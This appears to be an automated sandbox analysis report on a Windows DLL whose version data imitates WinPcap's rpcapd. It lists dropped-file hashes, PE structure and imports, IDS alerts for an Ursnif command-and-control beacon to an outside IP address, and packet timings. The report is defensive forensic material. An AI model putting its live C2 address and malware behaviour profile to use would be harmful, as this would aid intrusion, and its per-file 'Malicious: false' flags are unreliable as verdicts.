Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 11606 |
Entropy (8bit): | 4.8910535897909355 |
Encrypted: | false |
SSDEEP: | 192:P9smn3YrKkkdcU6ChVsm5emlz9smyib4T4YVsm5emdYxoeRKp54ib49VFn3eGOVJ:dMib4T4YLiib49VoGIpN6KQkj2rIkjhQ |
MD5: | F84F6C99316F038F964F3A6DB900038F |
SHA1: | C9AA38EC8188B1C2818DBC0D9D0A04085285E4F1 |
SHA-256: | F5C3C45DF33298895A61B83FC6E79E12A767A2AE4E06B43C44C93CE18431793E |
SHA-512: | E5B80F0D754779E6445A14B8D4BA29DD6D0060CD3DA6AFD00416DDC113223DB48900F970F9998B2ABDADA423FBA4F11E9859ABB4E6DBA7FE9550E7D1D0566F31 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.985489714311352 |
Encrypted: | false |
SSDEEP: | 24:Hre9ERhfpaDfHVhKdNWI+ycuZhNPHqakSGHbPNnq9qd:LSjKd41ulPqa30Rq9K |
MD5: | 67C978F8F6E761129B658BABBAC2C0E3 |
SHA1: | 02E6453D6EA95F5A0EBB0631D927EE771F4B7B0A |
SHA-256: | 9BB6FB8D9FDC155D50F117D1CE410A264593B74F41FEA700ED29099228FA1C4A |
SHA-512: | 78B24238F9F3B4FCF3507F65C29D5F7BA58EBD9866A22239C476D50CDF207B93030B71584F41784CBB2DECB40C888689A5C7BD9953555770ACCCA9954B5A23BD |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1328 |
Entropy (8bit): | 3.965326095070505 |
Encrypted: | false |
SSDEEP: | 24:HJe9EuZfTDQDfHLWhKdNWI+ycuZhNsrakSPEPNnq9qd:ABTqrMKd41ulsra3PEq9K |
MD5: | E34239A621ECB61A5F50016AE522485A |
SHA1: | EDD24063A2BC018FA0F98951A747630C5925D5FE |
SHA-256: | E0F555AAE679A2E77185A2DAD637DAD6F1477AEA45415837C204061570AC891E |
SHA-512: | 5DBA844206EEA3E6E4EC60343E5AA08271F863EC568A169E9EB0904C0D4979CDC5435999ABA05E08CF6AD6DC29078C89CF6C0AC8509D7C3CB4DBEB7D60DECED1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:U:U |
MD5: | C4CA4238A0B923820DCC509A6F75849B |
SHA1: | 356A192B7913B04C54574D18C28D46E6395428AB |
SHA-256: | 6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B |
SHA-512: | 4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.0806512987018424 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKrak7YnqqPEPN5Dlq5J:+RI+ycuZhNsrakSPEPNnqX |
MD5: | 8C7366A75D058E4560576098B53C2E89 |
SHA1: | 5474E9C863C4BB1B86DA13FEB1DCBAC13BEA6A83 |
SHA-256: | 045887EA02E67AD0120E0D470B59C58099BFDBA859F1F3E31989AE8800BC7765 |
SHA-512: | CDA6B16F3E42B84FB648CD74482E2B7C4B9E2EB463F8D24A96E3893AD7667D9CBC094AE597AF695AD032ADA6CADE89F3E891EC2F6896966882516BBE7DBC3BF1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 417 |
Entropy (8bit): | 5.038440975503667 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJlmMRSRa+eNMjSSRr/++5xVBuSRNA5cWGQRZry:V/DTLDfu09eg5rG+5zBlK5Ny |
MD5: | AE91D1351B9FB773FEF9B6F31D0A22EE |
SHA1: | 323F9FAD2F10ABDC97A7BF643A35DE67E3A32E31 |
SHA-256: | 2CEDA574437717CB5084A6D8315F059002F22D45837C60C003F1F09BB0A72DCD |
SHA-512: | 94C098F8D6FA16950D6CC582D7303D6B1383126C8DB3AA1C85D7E4E155143E2A4E42B3C96A7B5EFAA53CA3AA8A81CDB97B641D1F4521C67456158C32046A8E23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.246210484932597 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fbNOzxs7+AEszIwkn23fbNYA:p37Lvkmb6KRfT4WZEifT1 |
MD5: | 1DFF526FD701241566C75FC5465D31AF |
SHA1: | 5D91CBBE8D1F790F3A38CE35DAB4F705A0BEEF6E |
SHA-256: | ED2CAE80D53441FB70A3307AEB276D80C5D4176F9A9D336B5C87305DC0064ACF |
SHA-512: | E38E5E1D62A47ACAE2F46256453F82352BD5A6AF881D21EB8EC317AB60B4AE452E95E018271A9DD44FA9176799BFE8FB05E5359AF14399820DF6EDAECE85B2D5 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6501357671778076 |
Encrypted: | false |
SSDEEP: | 24:etGSzMWWOJy853Ek0s2E7OgDdWQzbtkZfkd2OWI+ycuZhNsrakSPEPNnq:6pvz5UkGE7vxWQzqJkd211ulsra3PEq |
MD5: | 0DB7703243576F0A4B5D43BDB20FD12B |
SHA1: | 67974086EB1D388F41FA3D91AB2BE5C6EE06D2CF |
SHA-256: | 6B514B672F123A4399CAE02C921B046A1FC00D0A01C34B758A7D14F92E1C8BE1 |
SHA-512: | 0962E8886173F666E25787071C9794A4A158FAC0226AE3B19E9E954EC2088268172F1F4AE23671A74BF47E715048082E3E7904B32C5EAF74B0EBBE30A6117A2F |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.325866700512367 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfTJEifTQKaM5DqBVKVrdFAMBJTH:Akka6CTJEuTQKxDcVKdBJj |
MD5: | EE4CA1452DEB397DB57596D3E6012A15 |
SHA1: | E8C4E64E4E2C6AE91EB3B78C460A8D65FB9377EA |
SHA-256: | 102035269C1F6AC6AECEC5D33A268EDB5A33E3BBA56F775441E271EF9C71A7CC |
SHA-512: | EBEB340BC62C181C89B1694C8DBB2D55326A7F19D987686A5A0F7E1B0A59A2824E488CFDD710F2FFABD8683F8038E0FA5163929004F631216B1EA355FD11BE35 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.089404989746942 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1Hqak7YnqqGHbPN5Dlq5J:+RI+ycuZhNPHqakSGHbPNnqX |
MD5: | 611F888895B72D1096C460FF7EA5E4B7 |
SHA1: | 67CCD8B6129567C2A7CF8B601FD2709FA13D13D0 |
SHA-256: | FFF630440C6AC27F1A70771D2279FE270829A76357941949BA22EB16BD260D6F |
SHA-512: | 0FB11E6584AA80780E1C263285F568A6C77773F35D7A3724692C2B8DD0A0E52D3A8CAA2D4F434F69109650B9243DC474C8EA2BD5C157C8734C297E5584912CA6 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 411 |
Entropy (8bit): | 5.082169696837192 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJEPWmMRSR7a1TriuSRa+rVSSRnA/fewoZQy:V/DTLDfu+Pdx9rV5nA/PwQy |
MD5: | 248E15CD19191D4333303E0E1F8E9A70 |
SHA1: | 9896EF9708F81AE4E3F2CA86329AD6BD82C700C3 |
SHA-256: | 0C6C066612882CD36BB425C21983258A23536FFA9E444FE57056C2D95D8B32DF |
SHA-512: | 8975F34DBF35E597A91A3F0F75B6A7D074B68A5D597BC3F1CC797EF2C90E4D6F25F9F132A636DD9CA302A2683D26794E0275C6ED0AC4CC8951B07F65C5642FD1 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.22267238940763 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23ftUsX0zxs7+AEszIwkn23ftUs2WH:p37Lvkmb6KRf2sEWZEif2sxH |
MD5: | 7261F6CD6A6D4860AC034E27509DC55F |
SHA1: | C1282BE561B76009A43FD5BC192CE9D76AF08272 |
SHA-256: | F7F9574C754A9C5B3A633B90174E4FAC3FBB9D5657E79D07D9CAAF0BAA8FE5EA |
SHA-512: | CBB1190E96E9929BD12DEB50F2916777C8B8845630DE251A733A49567E7DD290F27673B0918D30B4C6691A0142EEF8A4802D6123DC8BECE77E5CA943CD609813 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.6369801237092227 |
Encrypted: | false |
SSDEEP: | 24:etGSh8+mUE7R853RY0kCGs+4I4tkZfmPqDZ0WI+ycuZhNPHqakSGHbPNnq:63XE7S505Jm0ZX1ulPqa30Rq |
MD5: | 21F3C262E8990FE0E1A44D58B448B899 |
SHA1: | 2CD298766EC3E59F36C316B35BB0728368117153 |
SHA-256: | D594A1A6D450503AB6BDDC352174CC5F680F84CBEEAC0483BB064BA27CB381F0 |
SHA-512: | 2975E0F079F3D0360854A1249B7A1FBAB7AE5EA851F3A6924302135C03A8DA9E44310CA7E9D82BC672C67755A121B01016B680FE97B060384C3EECF3EE9F9C23 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.327904541660146 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRf2SEif2eOKaM5DqBVKVrdFAMBJTH:Akka6C2SEu2eOKxDcVKdBJj |
MD5: | 51149F7278FBC7AB67B11D6B7BF38CF0 |
SHA1: | 15D9E224C099E0795568A20DAFACEEA4BF50D88A |
SHA-256: | 6477E4EF8AF1EEA40F7734141A2CA95216DCD1BC01C53397ADBEABD2913543CB |
SHA-512: | DCB5699FB0966FF9D79A08AB874CDC2106FD74133878789C469A2EA31970A4B4FBBA138916763DF2C0EAEC64D45120E5A17D1EB5DA7B2D876098DBB4ACED025C |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.112861669562404 |
TrID: |
|
File name: | VoevdOQpeU.dll |
File size: | 640699 |
MD5: | ba155d8aed7ca303fcfc3f0248d218e1 |
SHA1: | 600453c21cdbecdbea9c825df4754b8a1829d649 |
SHA256: | a5ea92139f59d185548e8f48d1ce65cbf54bf1e3e1930de221091017fd1d4f0a |
SHA512: | 5b58791e43d9fef57d3233ab015ea0609901ab5d7cc70b6a4d0291ea38e0082af06ba9a8996b6ac822d00f9dc3bf014bb5aabeebd5bf480f92e23372e0850582 |
SSDEEP: | 12288:+w1lEKREbddtOYRbHzcPwka1dCjc3N8ZB:+w1lEKOpuYxiwkkgjAN8ZB |
TLSH: | 12D4BD1A029B2102EBB6CE78A751636C54574CE09B01E2CFC9190DA395E34FBF4FA5ED |
File Content Preview: | MZ......................@...................................P...........!..L.!This program cannot be run in DOS mode....$........9.(.X.{.X.{.X.{...{0X.{...{.Y.{G.-{.X.{~.({.Y.{..M{.X.{K..z.X.{..r{}Y.{.X.{PX.{K..z.Y.{.!8{.Y.{Rich.X.{....................... |
Icon Hash: | 74f0e4ecccdce0e4 |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | true |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x3F4B4692 [Tue Aug 26 11:37:54 2003 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | fd1c62e6f93e304a27347077f6d2b44c |
Signature Valid: | |
Signature Issuer: | |
Signature Validation Error: | |
Error Number: | |
Not Before, Not After | |
Subject Chain | |
Version: | |
Thumbprint MD5: | |
Thumbprint SHA-1: | |
Thumbprint SHA-256: | |
Serial: |
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x97000 | 0xc8 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x98000 | 0x703 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x99000 | 0x46b8 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x41001 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9731c | 0x254 | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3f170 | 0x40000 | False | 0.371898651123 | data | 4.44682748237 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x41000 | 0x4001b | 0x41000 | False | 0.805322265625 | data | 7.15716511851 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x82000 | 0x14957 | 0x12000 | False | 0.179578993056 | data | 5.40188601701 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x97000 | 0xadd | 0x1000 | False | 0.217041015625 | data | 2.64887682924 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x98000 | 0x703 | 0x1000 | False | 0.1220703125 | data | 1.10395588442 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x99000 | 0x53a5 | 0x6000 | False | 0.152099609375 | data | 5.13419580461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_VERSION | 0x98170 | 0x3d0 | data | | |

DLL | Import |
---|---|
WINSPOOL.DRV | GetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification |
msvcrt.dll | toupper |
USER32.dll | DestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW |
OLEAUT32.dll | LHashValOfNameSysA |
SHELL32.dll | FindExecutableW |
KERNEL32.dll | lstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA |
Secur32.dll | InitializeSecurityContextW |
ADVAPI32.dll | GetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner |
GDI32.dll | GetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW |

Description | Data |
---|---|
LegalCopyright | Copyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino. |
InternalName | rpcapd |
FileVersion | 4.0.0.1040 |
CompanyName | CACE Technologies |
LegalTrademarks | |
ProductName | WinPcap |
ProductVersion | 4.0.0.1040 |
FileDescription | Remote Packet Capture Daemon |
Build Description | |
OriginalFilename | rpcapd.exe |
Translation | 0x0000 0x04b0 |

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/23/22-08:12:19.910177 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
04/23/22-08:12:21.823792 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
04/23/22-08:11:59.593120 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.42.16 |
04/23/22-08:12:20.776897 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |

Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 23, 2022 08:12:21.231950998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.231980085 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.231992006 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232021093 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232122898 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232151985 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232172966 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232187033 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232191086 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232269049 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232482910 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232541084 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232568979 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232570887 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232610941 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232629061 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232664108 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.232671976 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.232719898 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.271845102 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.271897078 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.271924973 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.271928072 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.271966934 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.271967888 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272027969 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272028923 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272062063 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272087097 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272104025 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272146940 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272154093 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272175074 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272202015 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272217989 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272258997 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272260904 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272286892 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272310019 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272387981 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272443056 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272449017 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272504091 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272659063 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272723913 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272727013 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272761106 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272780895 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272820950 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272861004 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.272871017 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.272923946 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.311638117 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311677933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311692953 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311712027 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311734915 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311748981 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.311892033 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.311938047 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312145948 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312172890 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312189102 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312232018 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312515974 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312540054 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312556982 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312581062 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312598944 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312623024 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312671900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312839985 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312865019 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312880039 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312903881 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312907934 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.312927961 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312944889 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.312959909 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.313005924 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.313044071 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.313069105 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.313082933 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.313112974 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.313148975 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.313199997 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.313252926 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.351893902 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.351959944 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.351999998 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352032900 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352050066 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
Apr 23, 2022 08:12:21.352075100 CEST | 49766 | 80 | 192.168.2.4 | 146.70.35.138 |
Apr 23, 2022 08:12:21.352091074 CEST | 80 | 49766 | 146.70.35.138 | 192.168.2.4 |
